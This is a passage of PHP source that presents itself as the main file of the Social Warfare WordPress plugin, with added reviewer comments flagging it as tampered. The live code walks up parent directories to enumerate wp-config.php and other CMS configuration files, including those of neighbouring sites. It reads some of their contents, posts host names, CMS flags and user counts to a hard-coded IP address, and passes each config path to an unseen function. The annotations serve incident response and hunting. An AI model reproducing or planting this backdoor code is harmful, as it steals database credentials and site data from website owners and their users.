246 | curl_setopt($ch, CURLOPT_POST, 1); |
---|
247 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data |
---|
248 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); |
---|
249 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( |
---|
250 | 'Content-Type: application/json', // Set content type to JSON |
---|
251 | 'Content-Length: ' . strlen(json_encode($post_data)) // Set content length |
---|
252 | )); |
---|
253 | $response = curl_exec($ch); |
---|
254 | $error = curl_error($ch); // Get any curl error |
---|
255 | curl_close($ch); |
---|
256 | |
---|
257 | if ($response === false) { |
---|
258 | //echo "POST request failed: $error\n"; |
---|
259 | $z = false; |
---|
260 | } else { |
---|
261 | //echo "POST request sent successfully. Response: $response\n"; |
---|
262 | $z = true; |
---|
263 | } |
---|
264 | } else { |
---|
265 | //echo "Domain retrieval failed.\n"; |
---|
266 | $z = false; |
---|
267 | } |
---|
268 | $mysqli->close(); |
---|
269 | } |
---|
270 | } else { |
---|
271 | //echo "WP-CONFIG [NOT FOUND]\n"; |
---|
272 | $z = false; |
---|
273 | } |
---|
274 | } |
---|
275 | |
---|
// REVIEW (host reconnaissance): inventories the web applications that share this server.
//   - The nested search_for_config_files() climbs up to $max_parents (default 3) readable
//     parent directories above __DIR__, then recursively lists every path ending in '.php'
//     under the highest one it reached.
//   - Each path is classified by filename (wp-config.php, class-wc-settings.php, env.php,
//     config.php, parameters.php, settings.php, ...). For several types the file's CONTENTS
//     are read with file_get_contents() to look for a marker string.
//   - Paths of WordPress, WooCommerce and Magento config files are appended to the globals
//     $wp_config_paths, $wc_config_paths and $mg_config_paths.
//   - The per-CMS flags (as the strings 'true' / 'false') and $_SERVER['HTTP_HOST'] are
//     POSTed as JSON to https://94.156.79[.]8/FCS through send_post_request().
// $paths_to_check, $files_to_search, $detected_dat_files and $url2 are assigned but not used
// further in the code visible here. One $paths_to_check entry is a hard-coded vhost path.
// Because the walk leaves the plugin directory, other sites on a shared account can be
// enumerated too, so isolate sites per system user and restrict PHP's filesystem reach.
// Hunting: a full recursive directory walk on an admin request (slow first admin page load,
// bursts of stat/open calls from PHP) and outbound posts to the address above.
276 | function check_cms_configuration_files() { |
---|
277 | global $wpuserscount; |
---|
278 | global $wp_config_paths; |
---|
279 | global $wc_config_paths; |
---|
280 | global $mg_config_paths; |
---|
281 | // Function to recursively search directories for configuration files |
---|
282 | //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) { |
---|
283 | function search_for_config_files(&$cms_config_files, $max_parents = 3) { |
---|
284 | // Get the current directory |
---|
285 | $directory = __DIR__; |
---|
286 | |
---|
287 | // Initialize the variable to keep track of the last readable path |
---|
288 | $last_readable_path = null; |
---|
289 | |
---|
290 | // Iterate to go one parent folder up until no read permission or $max_parents levels (default 3) |
---|
291 | for ($i = 0; $i < $max_parents; $i++) { |
---|
292 | // Check if the directory exists and is readable |
---|
293 | if (is_dir($directory) && is_readable($directory)) { |
---|
294 | $last_readable_path = $directory; |
---|
295 | } else { |
---|
296 | // Stop iteration if the directory is not readable |
---|
297 | break; |
---|
298 | } |
---|
299 | |
---|
300 | // Move one directory up |
---|
301 | $directory = dirname($directory); |
---|
302 | } |
---|
303 | |
---|
304 | // If a readable path was found, perform a recursive glob search for the specified file extensions |
---|
305 | if (!empty($last_readable_path)) { |
---|
306 | |
---|
307 | $config_files = []; |
---|
308 | $files = []; |
---|
309 | //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur'; |
---|
310 | try { |
---|
311 | $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); |
---|
312 | foreach($objects as $name => $object){ |
---|
313 | if (substr($name, -4) === '.php') { |
---|
314 | // Add only files ending with '.php' to the $files array |
---|
315 | //echo "$name\n"; |
---|
316 | $files[] = $name; |
---|
317 | } |
---|
318 | } |
---|
319 | } catch (Exception $e) { |
---|
320 | // Handle any exceptions that occur during iteration |
---|
321 | // You can log the error or take appropriate action here |
---|
322 | //echo "Error: " . $e->getMessage(); |
---|
323 | $d = 'sab'; |
---|
324 | } |
---|
325 | foreach ($files as $file) { |
---|
326 | // Add the found file to the list of config files |
---|
327 | //print($file); |
---|
328 | $cms_config_files[] = $file; |
---|
329 | } |
---|
330 | return $cms_config_files; |
---|
331 | } else { |
---|
332 | // Return an empty array if no readable path was found |
---|
333 | //echo("No Readable Paths"); |
---|
334 | return []; |
---|
335 | } |
---|
336 | } |
---|
337 | |
---|
338 | |
---|
339 | // Array to store detected CMS names |
---|
340 | $detected_cms = [ |
---|
341 | 'WordPress' => false, |
---|
342 | 'WooCommerce' => false, |
---|
343 | 'Magento' => false, |
---|
344 | 'OpenCart' => false, |
---|
345 | 'PrestaShop' => false, |
---|
346 | 'Drupal Commerce' => false, |
---|
347 | 'Symfony' => false, |
---|
348 | 'Laravel' => false, |
---|
349 | 'Zend Framework' => false |
---|
350 | ]; |
---|
351 | |
---|
352 | // Array to store detected .dat files |
---|
353 | $detected_dat_files = []; |
---|
354 | |
---|
355 | // Paths to check for CMS-specific configuration files |
---|
356 | $current_directory = __DIR__; |
---|
357 | $paths_to_check = [ |
---|
358 | '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin', |
---|
359 | $current_directory, |
---|
360 | '/etc', // Common system configuration directory |
---|
361 | '/var/www', // Example web root directory |
---|
362 | '/home', // Home directories |
---|
363 | '/opt', // Optional software packages |
---|
364 | '/usr/local', // Locally installed software |
---|
365 | '/usr/share', // Shared software resources |
---|
366 | '/var/lib', // Variable data directories |
---|
367 | ]; |
---|
368 | |
---|
369 | // Files to search for in each directory |
---|
370 | $files_to_search = [ |
---|
371 | 'app/etc/env.php', // Magento |
---|
372 | 'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce |
---|
373 | 'config.php', // OpenCart |
---|
374 | 'config/parameters.php', // PrestaShop |
---|
375 | 'sites/default/settings.php', // Drupal Commerce |
---|
376 | 'config/packages/*.yaml', // Symfony |
---|
377 | '.env', // Laravel |
---|
378 | 'config/autoload/*.global.php', // Zend Framework |
---|
379 | '*.dat', // .dat files |
---|
380 | ]; |
---|
381 | |
---|
382 | // Array to store CMS configuration files |
---|
383 | $cms_config_files = []; |
---|
384 | |
---|
385 | // Iterate through the paths to check and search for configuration files in each directory recursively |
---|
386 | |
---|
387 | search_for_config_files($cms_config_files); |
---|
388 | |
---|
389 | |
---|
390 | // Process the detected configuration files and extract CMS information |
---|
391 | foreach ($cms_config_files as $file) { |
---|
392 | // echo($file); |
---|
393 | if (strpos($file, 'wp-config.php') !== false) { |
---|
394 | |
---|
395 | $detected_cms['WordPress'] = true; |
---|
396 | $wp_config_paths[] = $file; |
---|
397 | |
---|
398 | } elseif (strpos($file, 'class-wc-settings.php') !== false) { |
---|
399 | // You may add a specific check for WooCommerce here if needed |
---|
400 | $detected_cms['WooCommerce'] = true; |
---|
401 | $wc_config_paths[] = $file; |
---|
402 | } elseif (strpos($file, 'env.php') !== false && |
---|
403 | strpos($file, 'Composer') === false && |
---|
404 | strpos($file, 'composer') === false && |
---|
405 | strpos($file, 'Softaculous') === false) { |
---|
406 | // You may add a specific check for Magento here if needed |
---|
407 | // Read the content of the file |
---|
408 | $fileContent = file_get_contents($file); |
---|
409 | |
---|
410 | // Check if the content contains the string 'host' => ' |
---|
411 | if (strpos($fileContent, "'host' => '") !== false) { |
---|
412 | $detected_cms['Magento'] = true; |
---|
413 | $mg_config_paths[] = $file; |
---|
414 | /*echo("MAGENTO\n\n\n"); |
---|
415 | echo("MAGENTO\n\n\n"); |
---|
416 | echo("MAGENTO\n\n\n"); |
---|
417 | echo("MAGENTO\n\n\n"); |
---|
418 | echo("MAGENTO\n\n\n"); |
---|
419 | echo("MAGENTO\n\n\n"); |
---|
420 | echo("MAGENTO\n\n\n"); |
---|
421 | echo("MAGENTO\n\n\n"); |
---|
422 | echo($file); |
---|
423 | echo($file); |
---|
424 | echo($file); |
---|
425 | echo($file); |
---|
426 | echo($file); |
---|
427 | echo("MAGENTO\n\n\n"); |
---|
428 | echo("MAGENTO\n\n\n"); |
---|
429 | echo("MAGENTO\n\n\n"); |
---|
430 | echo("MAGENTO\n\n\n"); |
---|
431 | echo("MAGENTO\n\n\n"); |
---|
432 | echo("MAGENTO\n\n\n"); |
---|
433 | echo("MAGENTO\n\n\n"); |
---|
434 | echo("MAGENTO\n\n\n");*/ |
---|
435 | } |
---|
436 | |
---|
437 | } elseif (strpos($file, 'config.php') !== false && |
---|
438 | strpos($file, 'Composer') === false && |
---|
439 | strpos($file, 'composer') === false && |
---|
440 | strpos($file, 'Softaculous') === false) { |
---|
441 | if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) { |
---|
442 | $detected_cms['OpenCart'] = true; |
---|
443 | } |
---|
444 | } elseif (strpos($file, 'parameters.php') !== false) { |
---|
445 | if (strpos(file_get_contents($file), 'prestashop') !== false) { |
---|
446 | $detected_cms['PrestaShop'] = true; |
---|
447 | } |
---|
448 | } elseif (strpos($file, 'settings.php') !== false) { |
---|
449 | if (strpos(file_get_contents($file), 'drupal') !== false) { |
---|
450 | $detected_cms['Drupal Commerce'] = true; |
---|
451 | } |
---|
452 | } elseif (strpos($file, '.yaml') !== false) { |
---|
453 | if (strpos(file_get_contents($file), 'Symfony\Component') !== false) { |
---|
454 | $detected_cms['Symfony'] = true; |
---|
455 | } |
---|
456 | } elseif (strpos($file, '.env') !== false) { |
---|
457 | // You may add a specific check for Laravel here if needed |
---|
458 | $detected_cms['Laravel'] = true; |
---|
459 | } elseif (strpos($file, '.global.php') !== false) { |
---|
460 | // You may add a specific check for Zend Framework here if needed |
---|
461 | $detected_cms['Zend Framework'] = true; |
---|
462 | } elseif (strpos($file, '.dat') !== false) { |
---|
463 | $detected_dat_files[] = $file; |
---|
464 | } |
---|
465 | } |
---|
466 | |
---|
467 | // Convert the boolean values to strings |
---|
468 | foreach ($detected_cms as $cms => $detected) { |
---|
469 | $detected_cms[$cms] = $detected ? 'true' : 'false'; |
---|
470 | } |
---|
471 | |
---|
472 | // Now $detected_cms array contains the names of detected CMS based on the configuration files found |
---|
473 | // And $detected_dat_files array contains the paths of detected .dat files |
---|
474 | |
---|
475 | // Read users from the database and count them for WordPress and WooCommerce |
---|
476 | $wordpress_users = $wpuserscount; |
---|
477 | //$woocommerce_users = get_woocommerce_user_count(); |
---|
478 | $woocommerce_users = 000; |
---|
479 | |
---|
480 | // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts |
---|
481 | $url1 = 'https://94.156.79.8/FCS'; |
---|
482 | $url2 = 'https://94.156.79.8/CMSUsers'; |
---|
483 | |
---|
484 | $data1 = [ |
---|
485 | 'host' => $_SERVER['HTTP_HOST'], |
---|
486 | 'cms' => $detected_cms |
---|
487 | ]; |
---|
488 | |
---|
489 | //print_r($detected_cms); |
---|
490 | |
---|
491 | // Send data to the endpoints using CURL |
---|
492 | send_post_request($url1, $data1); |
---|
493 | // Additional logic as needed |
---|
494 | } |
---|
495 | |
---|
// REVIEW (exfiltration): POSTs the site host ($currdomain) and the user-table row count
// captured by add_admin_user() ($wpuserscount) as JSON to https://94.156.79[.]8/CMSUsers.
// The WooCommerce count is always sent as 0. No database query is made here; both values
// are read from globals.
496 | function getWPUsers(){ |
---|
497 | global $wpuserscount; |
---|
498 | global $currdomain; |
---|
499 | // Read users from the database and count them for WordPress and WooCommerce |
---|
500 | $wordpress_users = $wpuserscount; |
---|
501 | //$woocommerce_users = get_woocommerce_user_count(); |
---|
502 | $woocommerce_users = 000; |
---|
503 | $url2 = 'https://94.156.79.8/CMSUsers'; |
---|
504 | $data2 = [ |
---|
505 | 'host' => $currdomain, |
---|
506 | 'wordpress_users' => $wordpress_users, |
---|
507 | 'woocommerce_users' => $woocommerce_users |
---|
508 | ]; |
---|
509 | |
---|
510 | // Send data to the endpoints using CURL |
---|
511 | send_post_request($url2, $data2); |
---|
512 | } |
---|
513 | |
---|
/**
 * Placeholder that always returns 0.
 *
 * Despite the name, no database query is made; the body is template text with
 * the example calls left commented out. No call to this function appears in
 * the visible part of the file.
 *
 * @return int Always 0.
 */
function get_wordpress_user_count() {
    // Your implementation to fetch user count from the WordPress database
    // Example:
    // $count = query_wordpress_database();
    // return $count;
    return 0;
}
---|
522 | |
---|
/**
 * Placeholder that always returns 0.
 *
 * No WooCommerce data is read. In the visible part of the file the only
 * references to this function are in commented-out lines, so the value it
 * returns is not used there.
 *
 * @return int Always 0.
 */
function get_woocommerce_user_count() {
    // Your implementation to fetch user count from the WooCommerce database
    // Example:
    // $count = query_woocommerce_database();
    // return $count;
    return 0;
}
---|
531 | |
---|
/**
 * POSTs $data as a JSON body to $url using PHP's cURL extension.
 *
 * The response body is captured into $response and then discarded, and the
 * result of curl_exec() is never checked, so callers cannot tell whether the
 * request succeeded.
 *
 * NOTE(review): the request is made with curl_* calls directly rather than
 * through the WordPress HTTP API (wp_remote_post), so filters and logging that
 * hook that API will not see it. Detection has to rely on network egress
 * monitoring or on finding this code on disk. The callers visible in this file
 * pass URLs on 94.156.79.8.
 *
 * @param string $url  Destination URL.
 * @param mixed  $data Value passed to json_encode(); the visible callers pass arrays.
 * @return void
 */
function send_post_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    // Return the response as a string instead of echoing it into the page.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'Content-Length: ' . strlen(json_encode($data))
    ]);
    $response = curl_exec($ch);
    curl_close($ch);
    // $response is not read after this point.
}
---|
// Reset the three global path lists. In the visible part of the file only
// $wp_config_paths is used afterwards; $wc_config_paths and $mg_config_paths
// are initialised here and not referenced again.
global $wp_config_paths;
$wp_config_paths = [];
global $wc_config_paths;
$wc_config_paths = [];
global $mg_config_paths;
$mg_config_paths = [];
// NOTE(review): check_cms_configuration_files() is defined earlier in the file
// and starts outside the visible part. The code just above this point builds a
// host/CMS array and POSTs it to https://94.156.79.8/FCS; it appears to be the
// tail of that function, so this call runs that report immediately.
check_cms_configuration_files();
---|
553 | |
---|
/**
 * Collects wp-config.php paths, starting three directory levels above the
 * current working directory.
 *
 * Takes getcwd(), applies dirname() three times, and hands the resulting
 * directory to find_wp_configs_recursive(), which appends every match to
 * $wp_config_paths.
 *
 * NOTE(review): the starting point depends on the process working directory,
 * which this function does not control. Climbing three levels before searching
 * downwards can take the search outside the current site's own tree, for
 * example into sibling sites on a shared host; confirm against the deployment
 * layout when scoping an incident.
 *
 * @param array $wp_config_paths Passed by reference; found paths are appended.
 * @param int   $depth           Unused in this function.
 * @return void
 */
function find_wp_configs(&$wp_config_paths, $depth = 0) {
    $current_directory = getcwd();
    $parent_directory = $current_directory;

    // Go back three parents
    for ($i = 0; $i < 3; $i++) {
        $parent_directory = dirname($parent_directory);
    }

    // Start the search from the parent directory
    find_wp_configs_recursive($parent_directory, $wp_config_paths);
}
---|
566 | |
---|
/**
 * Walks $directory and all of its subdirectories, recording every
 * wp-config.php it finds.
 *
 * For each directory visited, the path "<directory>/wp-config.php" is appended
 * to $wp_config_paths when file_exists() reports it, then every entry returned
 * by scandir() that is a directory (other than "." and "..") is visited in
 * turn. There is no depth limit.
 *
 * NOTE(review): in a standard WordPress install wp-config.php holds the
 * database credentials and the authentication keys and salts. Enumerating
 * every copy reachable from the parent directories is not something a
 * share-button plugin needs; the paths collected here are handed to
 * pachamama() by the caller further down.
 *
 * @param string $directory       Directory to search.
 * @param array  $wp_config_paths Passed by reference; found paths are appended.
 * @return void
 */
function find_wp_configs_recursive($directory, &$wp_config_paths) {
    // Check if wp-config.php exists in the current directory
    $wp_config_file = $directory . '/wp-config.php';
    if (file_exists($wp_config_file)) {
        $wp_config_paths[] = $wp_config_file;
    }

    // Descend into every subdirectory; the return value of scandir() is used
    // without a failure check.
    $contents = scandir($directory);
    foreach ($contents as $item) {
        if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
            find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
        }
    }
}
---|
582 | |
---|
/**
 * Debug leftover with no observable effect.
 *
 * Every echo statement is commented out; what remains only assigns throwaway
 * locals ($z, $a) that are never read. The single call to this function that
 * is visible in the file is also commented out.
 *
 * @return void
 */
function print_wp_config_paths() {
    global $wp_config_paths;
    if (empty($wp_config_paths)) {
        //echo "No wp-config.php files found.\n";
        $z = 0;
    } else {
        //echo "List of wp-config.php files:\n";
        foreach ($wp_config_paths as $wp_config_path) {
            //echo "$wp_config_path\n";
            $a = 0;
        }
    }
}
---|
596 | //print_wp_config_paths(); |
---|
597 | |
---|
// Fill $wp_config_paths with every wp-config.php reachable from three levels
// above the working directory.
find_wp_configs($wp_config_paths);
foreach ($wp_config_paths as $wp_config_path) {
    // NOTE(review): pachamama() is not defined in the visible part of the file.
    // It receives the path of each wp-config.php found, so review its body to
    // establish what is read from those files and where it is sent.
    pachamama($wp_config_path);
    // Posts the host name and user count to https://94.156.79.8/CMSUsers.
    getWPUsers();
    // Written once per config file found, and not at all when none is found.
    // NOTE(review): a wp_options row named 'my_admin_init_function_run' with
    // value 'yes' is a host-side artifact that suggests this loop has run.
    update_option('my_admin_init_function_run', 'yes');
}
---|
604 | |
---|
605 | }} |
---|
606 | |
---|
/**
 * Social Warfare is entirely a class-based, object oriented system. As such, the
 * main function of this file (the main plugin file loaded by WordPress) is to
 * simply load the main Social_Warfare class and then instantiate it. This will,
 * in turn, fire up all the functionality of the plugin.
 *
 * NOTE(review): the description above does not match the file as shown. Before
 * reaching this point the file also defines helper functions that search for
 * wp-config.php files and send cURL POST requests to 94.156.79.8. Compare this
 * file against a known-good copy of the release when verifying an install.
 *
 */
// Load the main class from the plugin's lib directory and start the plugin.
require_once SWP_PLUGIN_DIR . '/lib/Social_Warfare.php';
new Social_Warfare();
---|